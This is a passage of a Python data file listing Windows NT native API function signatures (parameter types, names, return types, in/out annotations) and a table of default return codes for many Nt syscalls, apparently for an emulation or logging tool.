'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtQuerySystemInformation': (4, ['SYSTEM_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SystemInformationClass', 'SystemInformation', 'SystemInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetSystemInformation': (3, ['SYSTEM_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['SystemInformationClass', 'SystemInformation', 'SystemInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtGetTickCount': (0, [], [], 'ULONG', []), 'NtQueryPerformanceCounter': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['PerformanceCounter', 'PerformanceFrequency'], 'NTSTATUS', ['__OUT', '__OUT_opt']), 'NtQuerySystemTime': (1, ['PLARGE_INTEGER'], ['SystemTime'], 'NTSTATUS', ['__OUT']), 'NtQueryTimerResolution': (3, ['PULONG', 'PULONG', 'PULONG'], ['MinimumResolution', 'MaximumResolution', 'CurrentResolution'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtSetSystemTime': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['SystemTime', 'PreviousTime'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetTimerResolution': (3, ['ULONG', 'BOOLEAN', 'PULONG'], ['DesiredResolution', 'SetResolution', 'CurrentResolution'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'RtlTimeFieldsToTime': (2, ['PTIME_FIELDS', 'PLARGE_INTEGER'], ['TimeFields', 'Time'], 'BOOLEAN', ['__IN', '__OUT']), 'RtlTimeToTimeFields': (2, ['PLARGE_INTEGER', 'PTIME_FIELDS'], ['Time', 'TimeFields'], 'VOID', ['__IN', '__OUT']), 'NtAllocateVirtualMemory': (6, ['HANDLE', 'PVOID', 'ULONG_PTR', 'PSIZE_T', 'ULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'ZeroBits', 'RegionSize', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__IN_OUT', '__IN', '__IN']), 'NtClose': (1, ['HANDLE'], ['Handle'], 'NTSTATUS', ['__IN']), 'NtCreateFile': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'AllocationSize', 'FileAttributes', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'EaBuffer', 'EaLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtCreateSection': (7, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'SectionPageProtection', 'AllocationAttributes', 'FileHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt']), 'NtDeviceIoControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'IoControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtDuplicateToken': (6, ['HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN', 'TOKEN_TYPE', 'PHANDLE'], ['ExistingTokenHandle', 'DesiredAccess', 'ObjectAttributes', 'EffectiveOnly', 'TokenType', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtFlushBuffersFileEx': (5, ['HANDLE', 'ULONG', 'PVOID', 'ULONG', 'PIO_STATUS_BLOCK'], ['FileHandle', 'Flags', 'Parameters', 'ParametersSize', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtFreeVirtualMemory': (4, ['HANDLE', 'PVOID', 'PSIZE_T', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'RegionSize', 'FreeType'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__IN']), 'NtFsControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FsControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtLockFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG', 'BOOLEAN', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key', 'FailImmediately', 'ExclusiveLock'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtOpenFile': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtOpenProcessToken': (3, ['HANDLE', 'ACCESS_MASK', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtOpenProcessTokenEx': (4, ['HANDLE', 'ACCESS_MASK', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'HandleAttributes', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtOpenThreadToken': (4, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtOpenThreadTokenEx': (5, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'ULONG', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'HandleAttributes', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtPrivilegeCheck': (3, ['HANDLE', 'PPRIVILEGE_SET', 'PBOOLEAN'], ['ClientToken', 'RequiredPrivileges', 'Result'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtQueryDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileName', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryDirectoryFileEx': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'ULONG', 'PUNICODE_STRING'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'QueryFlags', 'FileName'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtQueryInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryInformationToken': (5, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryObject': (5, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['Handle', 'ObjectInformationClass', 'ObjectInformation', 'ObjectInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT_opt', '__IN', '__OUT_opt']), 'NtQueryQuotaInformationFile': (9, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PSID', 'BOOLEAN'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length', 'ReturnSingleEntry', 'SidList', 'SidListLength', 'StartSid', 'RestartScan'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtQuerySecurityObject': (5, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR', 'ULONG', 'PULONG'], ['Handle', 'SecurityInformation', 'SecurityDescriptor', 'Length', 'LengthNeeded'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryVirtualMemory': (6, ['HANDLE', 'PVOID', 'MEMORY_INFORMATION_CLASS', 'PVOID', 'SIZE_T', 'PSIZE_T'], ['ProcessHandle', 'BaseAddress', 'MemoryInformationClass', 'MemoryInformation', 'MemoryInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtQueryVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FsInformation', 'Length', 'FsInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtReadFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN_opt', '__IN_opt']), 'NtSetInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtSetInformationThread': (4, ['HANDLE', 'THREADINFOCLASS', 'PVOID', 'ULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetInformationToken': (4, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetQuotaInformationFile': (4, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN']), 'NtSetSecurityObject': (3, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR'], ['Handle', 'SecurityInformation', 'SecurityDescriptor'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtUnlockFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtWriteFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt'])}\r\n\r\nsyscallRS = {'NtWorkerFactoryWorkerReady': 'STATUS_SUCCESS', 'NtMapUserPhysicalPagesScatter': 'STATUS_SUCCESS', 'NtWaitForMultipleObjects32': 'S_OK', 'NtReplyWaitReceivePortEx': 'STATUS_SUCCESS', 'NtQueryDefaultUILanguage': 'STATUS_SUCCESS', 'NtApphelpCacheControl': 'STATUS_SUCCESS', 'NtCreateProcessEx': 'STATUS_SUCCESS', 'NtIsProcessInJob': 'STATUS_SUCCESS', 'NtAccessCheckByTypeAndAuditAlarm': 'STATUS_SUCCESS', 'NtTraceEvent': 'STATUS_SUCCESS', 'NtPowerInformation': 'STATUS_SUCCESS', 'NtAccessCheckByType': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultList': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultListAndAuditAlarm': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle': 'STATUS_SUCCESS', 'NtAddAtomEx': 'STATUS_SUCCESS', 'NtAddBootEntry': 'STATUS_SUCCESS', 'NtAddDriverEntry': 'STATUS_SUCCESS', 'NtAdjustTokenClaimsAndDeviceGroups': 'STATUS_SUCCESS', 'NtAlertThreadByThreadId': 'STATUS_SUCCESS', 'NtAllocateReserveObject': 'STATUS_SUCCESS', 'NtGetNextProcess': 'STATUS_SUCCESS', 'NtGetNextThread': 'STATUS_SUCCESS', 'NtQueueApcThreadEx': 'STATUS_SUCCESS', 'NtUmsThreadYield': 'STATUS_SUCCESS', 'NtAllocateUserPhysicalPages': 'STATUS_SUCCESS', 'NtAllocateVirtualMemoryEx': 'STATUS_SUCCESS', 'NtAlpcAcceptConnectPort': 'STATUS_SUCCESS', 'NtAlpcCancelMessage': 'STATUS_SUCCESS', 'NtAlpcCreatePort': 'STATUS_SUCCESS', 'NtAlpcCreatePortSection': 'STATUS_SUCCESS', 'NtAlpcCreateResourceReserve': 'STATUS_SUCCESS', 'NtAlpcCreateSectionView': 'STATUS_SUCCESS', 'NtAlpcCreateSecurityContext': 'STATUS_SUCCESS', 'NtAlpcDeletePortSection': 'STATUS_SUCCESS', 'NtAlpcDeleteResourceReserve': 'STATUS_SUCCESS', 'NtAlpcDeleteSectionView': 'STATUS_SUCCESS', 'NtAlpcDeleteSecurityContext': 'STATUS_SUCCESS', 'NtAlpcDisconnectPort': 'STATUS_SUCCESS', 'NtAlpcImpersonateClientOfPort': 'STATUS_SUCCESS', 'NtAlpcOpenSenderProcess': 'STATUS_SUCCESS', 'NtAlpcOpenSenderThread': 'STATUS_SUCCESS', 'NtAlpcQueryInformation': 'STATUS_SUCCESS', 'NtAlpcQueryInformationMessage': 'STATUS_SUCCESS', 'NtAlpcRevokeSecurityContext': 'STATUS_SUCCESS', 'NtAlpcSendWaitReceivePort': 'STATUS_SUCCESS', 'NtAlpcSetInformation': 'STATUS_SUCCESS', 'NtEnumerateBootEntries': 'STATUS_SUCCESS', 'NtEnumerateDriverEntries': 'STATUS_SUCCESS', 'NtEnumerateSystemEnvironmentValuesEx': 'STATUS_SUCCESS', 'NtQueryBootEntryOrder': 'STATUS_SUCCESS', 'NtQueryBootOptions': 'STATUS_SUCCESS', 'NtQueryDriverEntryOrder': 'STATUS_SUCCESS', 'NtQuerySystemEnvironmentValueEx': 'STATUS_SUCCESS', 'NtSetBootEntryOrder': 'STATUS_SUCCESS', 'NtSetDriverEntryOrder': 'STATUS_SUCCESS', 'NtQuerySystemInformationEx': 'STATUS_SUCCESS', 'NtInitializeNlsFiles': 'STATUS_SUCCESS', 'NtAcquireCMFViewOwnership': 'STATUS_SUCCESS', 'NtCreateProfileEx': 'STATUS_SUCCESS', 'NtCreateWorkerFactory': 'STATUS_SUCCESS', 'NtFlushInstallUILanguage': 'STATUS_SUCCESS', 'NtGetMUIRegistryInfo': 'STATUS_SUCCESS', 'NtGetNlsSectionPtr': 'STATUS_SUCCESS', 'NtIsUILanguageComitted': 'STATUS_SUCCESS', 'NtReleaseCMFViewOwnership': 'STATUS_SUCCESS', 'NtReleaseWorkerFactoryWorker': 'STATUS_SUCCESS', 'NtQueryInformationWorkerFactory': 'STATUS_SUCCESS', 'NtSetInformationWorkerFactory': 'STATUS_SUCCESS', 'NtWaitForWorkViaWorkerFactory': 'STATUS_SUCCESS', 'NtShutdownWorkerFactory': 'STATUS_SUCCESS', 'NtSetTimerEx': 'STATUS_SUCCESS', 'NtCancelTimer2': 'STATUS_SUCCESS', 'NtSetTimer2': 'STATUS_SUCCESS', 'NtQueryWnfStateData': 'STATUS_SUCCESS', 'NtUpdateWnfStateData': 'STATUS_SUCCESS', 'NtDisableLastKnownGood': 'STATUS_SUCCESS', 'NtEnableLastKnownGood': 'STATUS_SUCCESS', 'NtCancelSynchronousIoFile': 'STATUS_SUCCESS', 'NtSetIoCompletion': 'STATUS_SUCCESS', 'NtSetIoCompletionEx': 'STATUS_SUCCESS', 'NtRemoveIoCompletionEx': 'STATUS_SUCCESS', 'NtNotifyChangeSession': 'STATUS_SUCCESS', 'NtAssociateWaitCompletionPacket': 'STATUS_SUCCESS', 'NtFlushProcessWriteBuffers': 'STATUS_SUCCESS', 'NtCommitComplete': 'STATUS_SUCCESS', 'NtCommitEnlistment': 'STATUS_SUCCESS', 'NtCommitTransaction': 'STATUS_SUCCESS', 'NtCreateEnlistment': 'STATUS_SUCCESS', 'NtCreateResourceManager': 'STATUS_SUCCESS', 'NtCreateTransaction': 'STATUS_SUCCESS', 'NtCreateTransactionManager': 'STATUS_SUCCESS', 'NtEnumerateTransactionObject': 'STATUS_SUCCESS', 'NtFreezeTransactions': 'STATUS_SUCCESS', 'NtGetNotificationResourceManager': 'STATUS_SUCCESS', 'NtOpenEnlistment': 'STATUS_SUCCESS', 'NtOpenResourceManager': 'STATUS_SUCCESS', 'NtOpenTransaction': 'STATUS_SUCCESS', 'NtOpenTransactionManager': 'STATUS_SUCCESS', 'NtPrepareComplete': 'STATUS_SUCCESS', 'NtPrepareEnlistment': 'STATUS_SUCCESS', 'NtPrePrepareComplete': 'STATUS_SUCCESS', 'NtPrePrepareEnlistment': 'STATUS_SUCCESS', 'NtPropagationComplete': 'STATUS_SUCCESS', 'NtPropagationFailed': 'STATUS_SUCCESS', 'NtQueryInformationEnlistment': 'STATUS_SUCCESS', 'NtQueryInformationResourceManager': 'STATUS_SUCCESS', 'NtQueryInformationTransaction': 'STATUS_SUCCESS', 'NtQueryInformationTransactionManager': 'STATUS_SUCCESS', 'NtReadOnlyEnlistment': 'STATUS_SUCCESS', 'NtRecoverEnlistment': 'STATUS_SUCCESS', 'NtRecoverResourceManager': 'STATUS_SUCCESS', 'NtRecoverTransactionManager': 'STATUS_SUCCESS', 'NtRegisterProtocolAddressInformation': 'STATUS_SUCCESS', 'NtRenameTransactionManager': 'STATUS_SUCCESS', 'NtRollBackComplete': 'STATUS_SUCCESS', 'NtRollBackEnlistment': 'STATUS_SUCCESS', 'NtRollBackTransaction': 'STATUS_SUCCESS', 'NtRollforwardTransactionManager': 'STATUS_SUCCESS', 'NtSetInformationEnlistment': 'STATUS_SUCCESS', 'NtSetInformationResourceManager': 'STATUS_SUCCESS', 'NtSetInformationTransaction': 'STATUS_SUCCESS', 'NtSetInformationTransactionManager': 'STATUS_SUCCESS', 'NtSinglePhaseReject': 'STATUS_SUCCESS', 'NtStartTm': 'STATUS_SUCCESS', 'NtThawRegistry': 'STATUS_SUCCESS', 'NtThawTransactions': 'STATUS_SUCCESS', 'NtDrawText': 'STATUS_SUCCESS', 'NtTraceControl': 'STATUS_SUCCESS', 'NtSetWnfProcessNotificationEvent': 'STATUS_SUCCESS', 'NtSetInformationVirtualMemory': 'STATUS_SUCCESS', 'NtOpenPrivateNamespace': 'STATUS_SUCCESS', 'NtCreatePrivateNamespace': 'STATUS_SUCCESS', 'NtDeletePrivateNamespace': 'STATUS_SUCCESS', 'NtReplacePartitionUnit': 'STATUS_SUCCESS', 'NtSerializeBoot': 'STATUS_SUCCESS', 'NtOpenKeyTransacted': 'STATUS_SUCCESS', 'NtOpenKeyTransactedEx': 'STATUS_SUCCESS', 'NtFreezeRegistry': 'STATUS_SUCCESS', 'NtCreateKeyTransacted': 'STATUS_SUCCESS', 'NtQuerySecurityAttributesToken': 'STATUS_SUCCESS', 'NtWow64CallFunction64': 'STATUS_SUCCESS', 'NtWow64WriteVirtualMemory64': 'STATUS_SUCCESS', 'NtAlpcConnectPortEx': 'STATUS_SUCCESS', 'NtAlpcImpersonateClientContainerOfPort': 'STATUS_SUCCESS', 'NtAreMappedFilesTheSame': 'STATUS_SUCCESS', 'NtAssignProcessToJobObject': 'STATUS_SUCCESS', 'NtCreateJobSet': 'STATUS_SUCCESS', 'NtCreateJobObject': 'STATUS_SUCCESS', 'NtOpenJobObject': 'STATUS_SUCCESS', 'NtQueryInformationJobObject': 'STATUS_SUCCESS', 'NtSetInformationJobObject': 'STATUS_SUCCESS', 'NtTerminateJobObject': 'STATUS_SUCCESS', 'NtCallEnclave': 'STATUS_SUCCESS', 'NtTerminateEnclave': 'STATUS_SUCCESS', 'NtInitializeEnclave': 'STATUS_SUCCESS', 'NtCreateEnclave': 'STATUS_SUCCESS', 'NtLoadEnclaveData': 'STATUS_SUCCESS', 'NtCreateSectionEx': 'STATUS_SUCCESS', 'NtMapViewOfSectionEx': 'STATUS_SUCCESS', 'NtUnmapViewOfSectionEx': 'STATUS_SUCCESS', 'NtCreatePartition': 'STATUS_SUCCESS', 'NtOpenPartition': 'STATUS_SUCCESS', 'NtManagePartition': 'STATUS_SUCCESS', 'NtMapUserPhysicalPages': 'STATUS_SUCCESS', 'NtAllocateUserPhysicalPagesEx': 'STATUS_SUCCESS', 'NtGetWriteWatch': 'STATUS_SUCCESS', 'NtResetWriteWatch': 'STATUS_SUCCESS', 'NtCreatePagingFile': 'STATUS_SUCCESS', 'NtCancelIoFileEx': 'STATUS_SUCCESS', 'NtCancelWaitCompletionPacket': 'STATUS_SUCCESS', 'NtCreateWaitCompletionPacket': 'STATUS_SUCCESS', 'NtCompareObjects': 'STATUS_SUCCESS', 'NtCompareTokens': 'STATUS_SUCCESS', 'NtContinueEx': 'STATUS_SUCCESS', 'NtCreateCrossVmEvent': 'STATUS_SUCCESS', 'NtCreateCrossVmMutant': 'STATUS_SUCCESS', 'NtCreateDirectoryObjectEx': 'STATUS_SUCCESS', 'NtCreateIRTimer': 'STATUS_SUCCESS', 'NtCreateLowBoxToken': 'STATUS_SUCCESS', 'NtCreateRegistryTransaction': 'STATUS_SUCCESS', 'NtCreateThreadEx': 'STATUS_SUCCESS', 'NtCreateTimer2': 'STATUS_SUCCESS', 'NtCreateTokenEx': 'STATUS_SUCCESS', 'NtCreateUserProcess': 'STATUS_SUCCESS', 'NtCreateWaitablePort': 'STATUS_SUCCESS', 'NtCreateWnfStateName': 'STATUS_SUCCESS', 'NtDebugContinue': 'STATUS_SUCCESS', 'NtDeleteBootEntry': 'STATUS_SUCCESS', 'NtDeleteDriverEntry': 'STATUS_SUCCESS', 'NtDeleteWnfStateData': 'STATUS_SUCCESS', 'NtDeleteWnfStateName': 'STATUS_SUCCESS', 'NtDirectGraphicsCall': 'STATUS_SUCCESS', 'NtFilterBootOption': 'STATUS_SUCCESS', 'NtFilterToken': 'STATUS_SUCCESS', 'NtFilterTokenEx': 'STATUS_SUCCESS', 'NtGetCachedSigningLevel': 'STATUS_SUCCESS', 'NtGetCompleteWnfStateSubscription': 'STATUS_SUCCESS', 'NtGetContextThread': 'STATUS_SUCCESS', 'NtGetCurrentProcessorNumber': 'S_OK', 'NtGetCurrentProcessorNumberEx': 'STATUS_SUCCESS', 'NtGetDevicePowerState': 'STATUS_SUCCESS', 'NtImpersonateAnonymousToken': 'STATUS_SUCCESS', 'NtInitializeRegistry': 'STATUS_SUCCESS', 'NtInitiatePowerAction': 'STATUS_SUCCESS', 'NtIsSystemResumeAutomatic': 'STATUS_SUCCESS', 'NtLoadKeyEx': 'STATUS_SUCCESS', 'NtLockProductActivationKeys': 'STATUS_SUCCESS', 'NtLockRegistryKey': 'STATUS_SUCCESS', 'NtMakePermanentObject': 'STATUS_SUCCESS', 'NtManageHotPatch': 'STATUS_SUCCESS', 'NtMapCMFModule': 'STATUS_SUCCESS', 'NtModifyBootEntry': 'STATUS_SUCCESS', 'NtModifyDriverEntry': 'STATUS_SUCCESS', 'NtNotifyChangeDirectoryFileEx': 'STATUS_SUCCESS', 'NtNotifyChangeMultipleKeys': 'STATUS_SUCCESS', 'NtOpenKeyEx': 'STATUS_SUCCESS', 'NtOpenKeyedEvent': 'STATUS_SUCCESS', 'NtOpenRegistryTransaction': 'STATUS_SUCCESS', 'NtPlugPlayControl': 'STATUS_SUCCESS', 'NtPssCaptureVaSpaceBulk': 'STATUS_SUCCESS', 'NtQueryAuxiliaryCounterFrequency': 'STATUS_SUCCESS', 'NtQueryDebugFilterState': 'STATUS_SUCCESS', 'NtQueryInformationByName': 'STATUS_SUCCESS', 'NtQueryInstallUILanguage': 'STATUS_SUCCESS', 'NtQueryLicenseValue': 'STATUS_SUCCESS', 'NtQueryOpenSubKeys': 'STATUS_SUCCESS', 'NtQueryOpenSubKeysEx': 'STATUS_SUCCESS', 'NtQueryPortInformationProcess': 'STATUS_SUCCESS', 'NtQuerySecurityPolicy': 'STATUS_SUCCESS', 'NtQueryWnfStateNameInformation': 'STATUS_SUCCESS', 'NtRenameKey': 'STATUS_SUCCESS', 'NtResumeProcess': 'STATUS_SUCCESS', 'NtRevertContainerImpersonation': 'STATUS_SUCCESS', 'NtRollbackRegistryTransaction': 'STATUS_SUCCESS', 'NtSaveKeyEx': 'STATUS_SUCCESS', 'NtSaveMergedKeys': 'STATUS_SUCCESS', 'NtSecureConnectPort': 'STATUS_SUCCESS', 'NtSetBootOptions': 'STATUS_SUCCESS', 'NtSetCachedSigningLevel': 'STATUS_SUCCESS', 'NtSetCachedSigningLevel2': 'STATUS_SUCCESS', 'NtSetContextThread': 'STATUS_SUCCESS', 'NtSetDebugFilterState': 'STATUS_SUCCESS', 'NtSetDefaultUILanguage': 'STATUS_SUCCESS', 'NtSetIRTimer': 'STATUS_SUCCESS', 'NtSetInformationDebugObject': 'STATUS_SUCCESS', 'NtSetInformationSymbolicLink': 'STATUS_SUCCESS', 'NtSetLdtEntries': 'STATUS_SUCCESS', 'NtSetSystemEnvironmentValueEx': 'STATUS_SUCCESS', 'NtSetSystemPowerState': 'STATUS_SUCCESS', 'NtSetThreadExecutionState': 'STATUS_SUCCESS', 'NtSetUuidSeed': 'STATUS_SUCCESS', 'NtSubscribeWnfStateChange': 'STATUS_SUCCESS', 'NtSuspendProcess': 'STATUS_SUCCESS', 'NtTranslateFilePath': 'STATUS_SUCCESS', 'NtUnloadKey2': 'STATUS_SUCCESS', 'NtUnloadKeyEx': 'STATUS_SUCCESS', 'NtUnsubscribeWnfStateChange': 'STATUS_SUCCESS', 'NtVdmControl': 'STATUS_SUCCESS', 'NtWaitForAlertByThreadId': 'STATUS_SUCCESS', 'NtWaitForDebugEvent': 'STATUS_SUCCESS', 'NtLoadKey3': 'STATUS_SUCCESS', 'NtAlpcConnectPort': 'STATUS_SUCCESS', 'NtCancelDeviceWakeupRequest': 'STATUS_SUCCESS', 'NtCreateChannel': 'STATUS_SUCCESS', 'NtFreeUserPhysicalPages': 'STATUS_SUCCESS', 'NtGetPlugPlayEvent': 'STATUS_SUCCESS', 'NtOpenChannel': 'STATUS_SUCCESS', 'NtReplyWaitSendChannel': 'STATUS_SUCCESS', 'NtSendWaitReplyChannel': 'STATUS_SUCCESS', 'NtSetContextChannel': 'STATUS_SUCCESS', 'NtRequestDeviceWakeup': 'STATUS_SUCCESS', 'NtRequestWakeupLatency': 'STATUS_SUCCESS', 'NtW32Call': 'STATUS_SUCCESS', 'KiUserApcDispatcher': 'S_OK', 'NtAlertThread': 'STATUS_SUCCESS', 'NtCallbackReturn': 'STATUS_SUCCESS', 'NtQueueApcThread': 'STATUS_SUCCESS', 'NtTestAlert': 'STATUS_SUCCESS', 'NtAddAtom': 'STATUS_SUCCESS', 'NtDeleteAtom': 